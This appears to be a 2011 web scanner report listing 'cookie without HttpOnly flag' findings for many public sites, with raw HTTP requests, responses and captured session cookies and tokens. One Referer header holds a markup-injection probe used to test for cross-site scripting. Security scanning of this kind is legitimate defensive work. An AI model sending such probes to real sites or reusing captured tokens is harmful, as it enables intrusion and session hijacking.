UserPref=ZM4E0es5+/XEPKcb4MMxmuznZiNyR6gzmDyuvhd39TYBscZma+7OBrLUTIyOOP5L3sOxz0fHi+PVrR7mWXqIyqofYHjJvSwGljfj0cWis60uRBkc1sDMnpiFAFA2IIWQcy0VuQkFO/hek0tlyUsNbuYdCElWcPRfXi2EhNSRROn/5eBkOahc4qN0YXGEPSxJXkpZsFFUUSU+6NyU2vkiTcA6YKmyCajS7mMAIbCCQEcVDyHYe/GzA3wLflh2+74ShUEGuIQUYMUcM2sdqOFPBWrtSn3q/r5KXVvVo3NHlIV0vVwFkMcJVoUPOq2S74LF/6hYIm/NwCdL9vCXUOjzqk7tUlQ3znq9WVE1fo0DdyrZ3XKTD152l098UAWXhdfxPyegtMSG3+GMu2CSzmKtj4j6dgItiNp5cZZ5baIxudoffyAijgZcIzX2w8f4DVw+AMxSy/RUheA=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:13 2011 GMT
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /gp/product/1935182374?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=1935182374 HTTP/1.1 Host: www.amazon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:29:13 GMT Server: Server x-amz-id-1: 0HRJE1J9WQNXJFNGE4NT p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC " x-amz-id-2: NW5s8gvokJzw5y8JSRfujzyLlaoU46emA4SVA7QeDoqwIRKJVd6WwTevRv3TMvWf Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=ISO-8859-1 Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: session-id=187-0383633-5130955; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT Set-cookie: UserPref=ZM4E0es5+/XEPKcb4MMxmuznZiNyR6gzmDyuvhd39TYBscZma+7OBrLUTIyOOP5L3sOxz0fHi+PVrR7mWXqIyqofYHjJvSwGljfj0cWis60uRBkc1sDMnpiFAFA2IIWQcy0VuQkFO/hek0tlyUsNbuYdCElWcPRfXi2EhNSRROn/5eBkOahc4qN0YXGEPSxJXkpZsFFUUSU+6NyU2vkiTcA6YKmyCajS7mMAIbCCQEcVDyHYe/GzA3wLflh2+74ShUEGuIQUYMUcM2sdqOFPBWrtSn3q/r5KXVvVo3NHlIV0vVwFkMcJVoUPOq2S74LF/6hYIm/NwCdL9vCXUOjzqk7tUlQ3znq9WVE1fo0DdyrZ3XKTD152l098UAWXhdfxPyegtMSG3+GMu2CSzmKtj4j6dgItiNp5cZZ5baIxudoffyAijgZcIzX2w8f4DVw+AMxSy/RUheA=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:13 2011 GMT Content-Length: 398788
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shopping/content/search HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /travel/ HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /travel/content/search HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /travel/deals/cheap-flights-to-the-caribbean.do HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /travel/deals/last-minute-flight-deals.do HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751?&qpvt=hawaii+hotels&cid=msn_tab&form=trvcon HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /travel/hotels HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.dailygrail.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: SESS2c2d3112bb07aea5c6314767c88e0a7a=7o9nkha47fuqrullf1i58nh6t2; expires=Tue, 22-Feb-2011 06:38:51 GMT; path=/; domain=.dailygrail.com Last-Modified: Sun, 30 Jan 2011 02:11:26 GMT ETag: "bf0c65ff60c7c1de71eb6cacfe0d3728" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 30 Jan 2011 03:05:32 GMT Server: lighttpd Content-Length: 63252
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" dir="ltr"> <head> <meta http-eq ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/ HTTP/1.1 Host: www.davidpoll.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1 Host: www.dooce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 01:52:34 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11 X-Powered-By: PHP/5.2.11 Set-Cookie: SESS30952fbaf4ac11922b9cafbdf8d115e4=0feb3e2c1484ef81e4f5902f9eda5c12; expires=Tue, 22-Feb-2011 05:25:54 GMT; path=/; domain=.dooce.com Last-Modified: Sun, 30 Jan 2011 01:51:21 GMT ETag: "f0b5f444b53d8d069d3f3c230e6ce5fd" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 10127
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"xmlns=xmlns:og="http://opengraphprot ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.kanoodle.com Proxy-Connection: keep-alive Referer: http://burp/show/43 Cache-Control: max-age=0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 14:53:25 GMT Server: Apache P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:25 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 10678
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <title>Kanoodle - Providing Search-Targeted Sponsored Links Since 1999< ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ajax/search_spy_data.html HTTP/1.1 Host: www.kanoodle.com Proxy-Connection: keep-alive Referer: http://www.kanoodle.com/js/ochart/open-flash-chart.swf?width=500&height=300&data=/ajax/search_spy_data.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 14:53:32 GMT Server: Apache P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:32 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 529
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ajax/search_spy_data_today.html HTTP/1.1 Host: www.kanoodle.com Proxy-Connection: keep-alive Referer: http://www.kanoodle.com/js/ochart/open-flash-chart.swf?width=500&height=300&data=/ajax/search_spy_data_today.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 14:53:32 GMT Server: Apache P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:32 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 765
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search_spy.html HTTP/1.1 Host: www.kanoodle.com Proxy-Connection: keep-alive Referer: http://www.kanoodle.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 14:53:31 GMT Server: Apache P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA" Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:31 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 14397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <title>Kanoodle - Providing Search-Targeted Sponsored Links Since 1999< ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cws/share-count?url=http%3A%2F%2Finformationarbitrage.com%2Fpost%2F3007820135%2Fstart-fund-no-big-deal-business-as-usual HTTP/1.1 Host: www.linkedin.com Proxy-Connection: keep-alive Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: bcookie="v=1&d94e49db-3c23-4a26-a29f-2bc2d85c808d"; visit=G
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID="ajax:8523036383389754514"; Version=1; Path=/ P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Set-Cookie: leo_auth_token="GST:8FX-AizfuLs_YwcHoZSvLUTR1AIZyDsYg1FmX3RAtkskBYeHYyd-1Z:1296398887:819be2dfbd9e083133f7ab8f52acc0fa6efb40e0"; Version=1; Max-Age=1799; Expires=Sun, 30-Jan-2011 15:18:06 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Vary: Accept-Encoding Content-Type: text/javascript;charset=UTF-8 Content-Language: en-US Date: Sun, 30 Jan 2011 14:48:07 GMT Content-Length: 137
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.msdn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 30 Jan 2011 15:48:49 GMT Server: Microsoft-IIS/6.0 P3P: CP='ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI' X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET Location: http://msdn.microsoft.com Content-Length: 23 Content-Type: text/html Set-Cookie: ASPSESSIONIDCQCAARBS=HDGLAPLCFCHLAHILNAHKNFDH; path=/ Cache-control: private
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /perseus/se.ashx HTTP/1.1 Host: www.msnfeedback.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Connection: close Date: Sun, 30 Jan 2011 01:58:26 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Location: /perseus/se.htm Set-Cookie: ASP.NET_SessionId=so3zhbfsyas5riuwao00fhn1; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 132
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href='/perseus/se.htm'>here</a>.</h2> </body></html>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/gpl-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/mit-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.popsci.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 30 Jan 2011 03:18:22 GMT Server: Apache Set-Cookie: SESS98684d1eb89eae890ac2d30814f7062d=3na39ksk8u091m5b71vntg50k3; expires=Tue, 22-Feb-2011 06:51:42 GMT; path=/; domain=.popsci.com Last-Modified: Sun, 30 Jan 2011 03:17:46 GMT Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Vary: Accept-Encoding,User-Agent X-Server-Name: web4b D=17304 Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=6bcr7p0ka1rpr4bsk02joad525; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.sciencenews.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /blog/observations/ HTTP/1.1 Host: www.scientificamerican.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /errors/404.cfm HTTP/1.1 Host: www.scientificamerican.com Proxy-Connection: keep-alive Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SSCIAMUSER=; CFID=155211566; CFTOKEN=70876219; CFGLOBALS=urltoken%3DCFID%23%3D155211566%26CFTOKEN%23%3D70876219%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23hitcount%3D2%23cftoken%3D70876219%23cfid%3D155211566%23; OAX=rcHW801FnIUACoU2
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /applications/SearchTools/item-details.asp HTTP/1.1 Host: www.tigerdirect.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.unica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 02:03:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: JSESSIONID=6CBE4A3A1D183B08A17C13A27DDBEAE2.ds1; Path=/ Set-Cookie: RedDotLiveServerSessionID_unica_corporate_2009=SID-51125F36-8F1B4ED4; Path=/ Date: Sun, 30 Jan 2011 02:03:21 GMT Expires: Sun, 30 Jan 2011 02:03:21 GMT lsrequestid: 44298918 Cache-Control: no-cache Pragma: no-cache Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><!-- PageID 1 - published by ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1 Host: www.walmart.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <head> <title> - Walmart</title> <link href="http://i2.walmartimages.com/css/global.css" rel="stylesheet" typ ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.zacks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 23:41:33 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/N3973.MSN/B4412732.227;sz=1x1;ord=1362758608? HTTP/1.1 Accept: */* Referer: http://www.redacted/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: ad.doubleclick.net Proxy-Connection: Keep-Alive
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Date: Sat, 29 Jan 2011 23:26:33 GMT Location: http://s0.2mdn.net/viewad/1150992/54-1x1.gif Cache-Control: no-cache Pragma: no-cache Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 23:41:33 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Server: GFE/2.0 Content-Type: text/html
The following cookies were issued by the application and do not have the HttpOnly flag set:
id=c883d90320000a3||t=1296407519|et=730|cs=2n6_cukr; path=/; domain=.doubleclick.net; expires=Tue, 29 Jan 2013 17:11:59 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 17:11:59 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 345 Set-Cookie: id=c883d90320000a3||t=1296407519|et=730|cs=2n6_cukr; path=/; domain=.doubleclick.net; expires=Tue, 29 Jan 2013 17:11:59 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 17:11:59 GMT Cache-Control: no-cache Pragma: no-cache Date: Sun, 30 Jan 2011 17:11:59 GMT Expires: Sun, 30 Jan 2011 17:11:59 GMT Discarded: true Connection: close
The following cookies were issued by the application and do not have the HttpOnly flag set:
id=c85508a32000084|685973/957280/15004|t=1296353092|et=730|cs=l6z5ub1z; path=/; domain=.doubleclick.net; expires=Tue, 29 Jan 2013 02:04:52 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 02:04:52 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /click;h=v8/3a9f/7/0/*/q;234336715;1-0;0;57860936;4307-300/250;40005125/40022912/1;;~okv=;pc=[TPAS_ID];;~sscs=?http:/specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch Set-Cookie: id=c85508a32000084|685973/957280/15004|t=1296353092|et=730|cs=l6z5ub1z; path=/; domain=.doubleclick.net; expires=Tue, 29 Jan 2013 02:04:52 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 02:04:52 GMT Date: Sun, 30 Jan 2011 02:04:52 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The following cookies were issued by the application and do not have the HttpOnly flag set:
id=c8a488932000097|737194/848412/15003|t=1296344711|et=730|cs=pupuuvqs; path=/; domain=.doubleclick.net; expires=Mon, 28 Jan 2013 23:45:11 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 28 Jan 2011 23:45:11 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /clk;235581983;52388360;s HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: test_cookie=CheckForPermission;
Response
